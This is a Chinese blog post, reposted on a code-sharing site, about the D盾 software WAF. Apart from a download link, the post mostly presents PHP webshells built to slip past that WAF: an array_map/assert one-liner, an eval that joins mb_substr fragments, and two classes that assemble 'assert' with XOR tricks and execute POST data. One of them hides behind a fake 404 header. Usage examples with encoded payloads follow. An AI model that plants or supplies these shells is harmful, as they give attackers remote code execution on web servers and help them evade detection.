码迷,mamicode.com
首页 > 其他好文 > 详细

应用安全-安全设备-Waf系列-软Waf-D盾

时间:2019-08-15 11:20:28      阅读:110      评论:0      收藏:0      [点我收藏+]

标签:ade   style   UNC   his   编码   public   return   iss   相同   

安装

下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip

使用说明

http://www.d99net.net/News.asp?id=106

免杀

array_map |  assert

<?php 
function test($a, $b)
{
    array_map($a, $b);
}
test(assert, array($_POST[‘x‘]));
?> 

mb_substr

<?php
$m=$_GET[‘1‘];
$a=mb_substr($m,0,1); 
$b=mb_substr($m,1,9999);
eval($a.$b);
?>

PHP一句话

class LTDS
{
    public function __destruct()
    {
        $bxo=‘X‘^"\x39";
        $woa=‘?‘^"\x4c";
        $ukt=‘K‘^"\x38";
        $gud=‘d‘^"\x1";
        $fbu=‘_‘^"\x2d";
        $agx=‘<‘^"\x48";
        $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;
        return @$HLWV($this->OX);
    }
}
$ltds=new LTDS();
@$ltds->OX=isset($_GET[‘id‘])?base64_decode($_POST[‘ua8‘]):$_POST[‘ua8‘];

http://www.xxx.com/shell.php  
POST: ua8=phpinfo();  //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随意更改)
POST: ua8=cGhwaW5mbygpOwo=  //payload的base64编码

异或 | PHP一句话

<?php 
header(‘HTTP/1.1 404‘);
class ZXVG
{
    public $c=‘‘;
    public function __destruct()
    {
        $_0=‘&‘^"\x47";
        $_1=‘C‘^"\x30";
        $_2=‘A‘^"\x32";
        $_3=‘v‘^"\x13";
        $_4=‘J‘^"\x38";
        $_5=‘f‘^"\x12";
        $db=$_0.$_1.$_2.$_3.$_4.$_5;
        return @$db($this->c);
    }
}
$zxvg=new ZXVG();
@$zxvg->c=$_POST[‘mr6‘];

 

应用安全-安全设备-Waf系列-软Waf-D盾

标签:ade   style   UNC   his   编码   public   return   iss   相同   

原文地址:https://www.cnblogs.com/AtesetEnginner/p/11356491.html

踩
(0)
赞
(0)
   
举报
评论 一句话评论(0)
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!